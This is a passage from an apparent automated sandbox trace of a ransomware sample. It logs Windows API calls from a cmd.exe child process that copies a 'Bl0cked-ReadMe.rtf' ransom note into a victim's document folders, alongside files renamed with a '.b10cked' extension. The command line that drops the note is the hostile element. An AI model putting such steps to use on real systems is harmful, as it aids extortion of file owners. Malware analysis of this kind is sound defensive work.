(normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf.b10cked"), dwFlags=0x3) returned 1 [0141.661] FindClose (in: hFindFile=0x4b0f48 | out: hFindFile=0x4b0f48) returned 1 [0141.661] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eea50 | out: _Buffer=" 1") returned 9 [0141.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.661] GetFileType (hFile=0x7) returned 0x2 [0142.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.249] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ee9dc | out: lpMode=0x2ee9dc) returned 1 [0142.249] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.249] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eea10 | out: lpConsoleScreenBufferInfo=0x2eea10) returned 1 [0142.249] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.250] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eea50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.250] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eea34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eea34*=0x1a) returned 1 [0142.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.250] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.250] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.250] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.250] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.251] SetConsoleInputExeNameW () returned 0x1 [0142.251] GetConsoleOutputCP () returned 0x1b5 
[0142.251] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.251] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.251] exit (_Code=0) Process: id = "174" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0xe90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15008 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15009 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15010 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15011 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 15012 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15013 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type 
= mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15014 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15015 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15016 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 15017 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16046 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16047 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16048 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16049 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 16050 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 16051 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16052 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file 
name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16053 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16054 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16055 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16056 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16057 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16058 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16059 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16060 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 16061 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 16062 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16063 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16064 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 16065 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 16066 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 16067 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 16068 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 16069 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 231 os_tid = 0xeb4 [0141.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf90c | out: lpSystemTimeAsFileTime=0x1cf90c*(dwLowDateTime=0x8e61be00, dwHighDateTime=0x1d440a9)) [0141.683] GetCurrentProcessId () returned 0xe90 [0141.683] GetCurrentThreadId () returned 0xeb4 [0141.683] GetTickCount () returned 0x2c65a [0141.683] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf904 | out: lpPerformanceCount=0x1cf904*=19847230024) returned 1 [0141.684] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.684] __set_app_type (_Type=0x1) [0141.684] __p__fmode () returned 0x76b331f4 [0141.684] __p__commode () returned 0x76b331fc 
[0141.684] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.684] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.684] GetCurrentThreadId () returned 0xeb4 [0141.684] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb4) returned 0x38 [0141.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.684] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.684] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.685] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.685] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf89c | out: phkResult=0x1cf89c*=0x0) returned 0x2 [0141.685] VirtualQuery (in: lpAddress=0x1cf8d3, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0141.685] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf86c, dwLength=0x1c | out: lpBuffer=0x1cf86c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0141.685] GetConsoleOutputCP () returned 0x1b5 [0141.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.685] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.686] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.686] GetEnvironmentStringsW () returned 0x1f0198* [0141.686] FreeEnvironmentStringsW (penv=0x1f0198) returned 1 [0141.686] GetEnvironmentStringsW () returned 0x1f0198* [0141.686] FreeEnvironmentStringsW (penv=0x1f0198) returned 1 [0141.686] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce80c | out: phkResult=0x1ce80c*=0x40) returned 0x0 [0141.686] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0xc0, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, 
lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x0, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegCloseKey (hKey=0x40) returned 0x0 [0141.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce80c | out: phkResult=0x1ce80c*=0x40) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x40, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, 
lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x1, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x0, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x9, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x4, lpData=0x1ce818*=0x9, lpcbData=0x1ce810*=0x4) returned 0x0 [0141.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce814, lpData=0x1ce818, lpcbData=0x1ce810*=0x1000 | out: lpType=0x1ce814*=0x0, lpData=0x1ce818*=0x9, lpcbData=0x1ce810*=0x1000) returned 0x2 [0141.687] RegCloseKey (hKey=0x40) returned 0x0 [0141.687] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.687] srand (_Seed=0x5b886370) [0141.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.688] GetModuleFileNameW (in: 
hModule=0x0, lpFilename=0x1f18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.688] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.688] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.688] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.688] GetEnvironmentStringsW () returned 0x1f22e8* [0141.688] FreeEnvironmentStringsW (penv=0x1f22e8) returned 1 [0141.688] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.688] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.688] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.688] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.688] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.688] _wcsicmp 
(_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.688] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.688] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.688] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.688] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.689] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf5d8, lpFilePart=0x1cf5d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf5d4*="Desktop") returned 0x18 [0141.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.689] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf354 | out: lpFindFileData=0x1cf354) returned 0x1f0028 [0141.689] FindClose (in: hFindFile=0x1f0028 | out: hFindFile=0x1f0028) returned 1 [0141.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf354 | out: lpFindFileData=0x1cf354) returned 0x1f0028 [0141.689] FindClose (in: hFindFile=0x1f0028 | out: hFindFile=0x1f0028) returned 1 [0141.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf354 | out: lpFindFileData=0x1cf354) returned 0x1f0028 [0141.689] FindClose (in: hFindFile=0x1f0028 | out: hFindFile=0x1f0028) returned 1 [0141.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.689] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.689] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.689] GetEnvironmentStringsW () returned 0x1f2b08* [0141.690] FreeEnvironmentStringsW (penv=0x1f2b08) returned 1 [0141.690] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.690] GetConsoleOutputCP () returned 0x1b5 [0141.690] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.690] GetUserDefaultLCID () returned 0x409 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf718, cchData=128 | out: lpLCData="0") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf718, cchData=128 | out: lpLCData="0") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf718, cchData=128 | out: lpLCData="1") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, 
cchData=8 | out: lpLCData=",") returned 2 [0141.691] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.692] GetConsoleTitleW (in: lpConsoleTitle=0x1e08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.693] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.693] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.693] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.693] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.693] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.693] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.693] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0141.693] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.693] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.693] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.693] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0141.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.697] GetFileType (hFile=0x7) returned 0x2 [0141.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf610 | out: lpMode=0x1cf610) returned 1 [0141.697] _dup (_FileHandle=1) returned 3 [0141.698] _close (_FileHandle=1) returned 0 [0141.698] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0141.698] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf5e0, dwCreationDisposition=0x2, 
